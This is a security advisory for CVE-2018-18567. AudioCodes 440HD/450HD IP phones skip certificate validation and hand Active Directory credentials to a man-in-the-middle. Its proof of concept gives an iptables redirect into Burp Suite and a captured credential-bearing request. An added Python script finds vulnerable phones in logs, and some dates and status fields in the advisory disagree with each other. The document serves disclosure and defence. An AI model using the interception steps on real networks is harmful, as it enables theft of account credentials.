AudioCodes 440HD / 450HD IP Phone 3.1.2.89 Man-In-The-Middle Vulnerability

25 Oct 2018 | Reported by Micha Borrmann | Type: zdt | Source: 0day.today

AudioCodes 440HD/450HD IP Phone 3.1.2.89 Man-In-The-Middle Vulnerability, Credentials Compromis


Product:                   440HD / 450HD IP Phone
Manufacturer:              AudioCodes
Affected Version(s):       <= 3.1.2.89
Tested Version(s):         VC_3.1.1.43.1, VC_3.1.2.89
Vulnerability Type:        X.509 validation - Man-in-the-Middle (CWE-300)
Risk Level:                Medium
Solution Status:           Open
Manufacturer Notification: 2018-08-29
Solution Date:             20??-??-??
Public Disclosure:         2018-10-23
CVE Reference:             CVE-2018-18567
Author of Advisory:        Micha Borrmann (SySS GmbH)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

If an AudioCodes 440HD/450HD IP Phone [1] is used with an on-premise
Skype for Business installation, the phone stores the credentials of
an Active Directory account. When an attacker performs a
man-in-the-middle attack, the phone gives these credentials away and
the account is therefore compromised. The phone itself remains fully
functional and shows no sign of the attack.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The phone sends the stored credentials to a website usually named
skypewebpool via HTTPS but does not validate the X.509 certificate.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

Configure Burp Suite as an invisible proxy and gain a man-in-the-middle position.

Set an iptables rule that routes the traffic through Burp Suite, such as

# iptables -A PREROUTING -t nat -i eth0 -s 192.168.100.100 -p tcp --dport 443 -j REDIRECT --to-port 8080

Watch the proxy history for an HTTP POST request like

POST /WebTicket/oauthtoken HTTP/1.1
Host: skypewebpool.example.com
User-Agent: AUDC/3.1.1.43 AUDC-IPPhone-440HD_UC_3.1.1.43/1
Content-Length: 163
Content-Type: application/x-www-form-urlencoded
Connection: close

grant_type=password&client_id=abc...&resource=https%3a%2f%2fskypewebpool.example.com&password=verytopsecretpassword&username=ADaccountname

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Install the new firmware, which integrates a trust store and enforces
a strict X.509 certificate validation policy.
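
To find phones that still need the firmware update, the following added example (not part of the SySS advisory or any AudioCodes tooling) scans web front-end access logs for the User-Agent shape shown in the PoC request and flags 440HD/450HD devices at or below 3.1.2.89. The log line layout, the sample lines and the four-component version comparison are assumptions.

```python
import re

# Advisory: 440HD / 450HD phones with firmware <= 3.1.2.89 are affected.
AFFECTED_MODELS = {"440HD", "450HD"}
LAST_AFFECTED = (3, 1, 2, 89)

# User-Agent shape taken from the PoC request on this page, e.g.
# "AUDC/3.1.1.43 AUDC-IPPhone-440HD_UC_3.1.1.43/1"
UA_RE = re.compile(
    r"AUDC-IPPhone-(?P<model>[0-9A-Za-z]+)_UC_(?P<version>\d+(?:\.\d+)*)"
)


def is_affected(model, version):
    """Return True if the model/firmware pair is in the advisory's affected range."""
    parts = tuple(int(p) for p in version.split("."))
    # Assumption: only the first four components matter, so a build such as
    # 3.1.1.43.1 is compared as 3.1.1.43.
    return model in AFFECTED_MODELS and parts[:4] <= LAST_AFFECTED


def find_affected_phones(log_lines):
    """Return sorted (client_ip, model, version) tuples for affected phones."""
    hits = {}
    for line in log_lines:
        match = UA_RE.search(line)
        if not match:
            continue  # not an AudioCodes IP phone request
        client_ip = line.split(maxsplit=1)[0]
        model, version = match["model"], match["version"]
        if is_affected(model, version):
            hits[client_ip] = (client_ip, model, version)  # one entry per phone
    return sorted(hits.values())


# Constructed sample lines in an assumed layout:
#   <client-ip> <method> <path> "<user-agent>"
# Version 3.1.4.10 is made up to stand in for a later firmware.
SAMPLE_LOG = [
    '192.168.100.100 POST /WebTicket/oauthtoken "AUDC/3.1.1.43 AUDC-IPPhone-440HD_UC_3.1.1.43/1"',
    '192.168.100.100 POST /WebTicket/oauthtoken "AUDC/3.1.1.43 AUDC-IPPhone-440HD_UC_3.1.1.43/1"',
    '192.168.100.101 POST /WebTicket/oauthtoken "AUDC/3.1.2.89 AUDC-IPPhone-450HD_UC_3.1.2.89/1"',
    '192.168.100.102 POST /WebTicket/oauthtoken "AUDC/3.1.4.10 AUDC-IPPhone-450HD_UC_3.1.4.10/1"',
    '192.168.100.103 GET /index.html "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, model, version in find_affected_phones(SAMPLE_LOG):
        print(f"{ip}: {model} firmware {version} is in the affected range")
```

Accounts used by any phone this reports should be treated as exposed to anyone who held a network position between the phone and the server, so plan a credential rotation alongside the upgrade.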

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2018-08-13: Detection of the vulnerability
2018-09-06: Vulnerability reported to manufacturer
2018-10-22: CVE number assigned
2018-10-23: Public release of the security advisory

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:
[1] Product web sites for the phones
    https://www.audiocodes.com/solutions-products/products/ip-phones/440hd-ip-phone
    https://www.audiocodes.com/solutions-products/products/ip-phones/450hd-ip-phone
[2] SySS Security Advisory SYSS-2018-026
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2018-026.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy/

#  0day.today [2018-10-25]  #
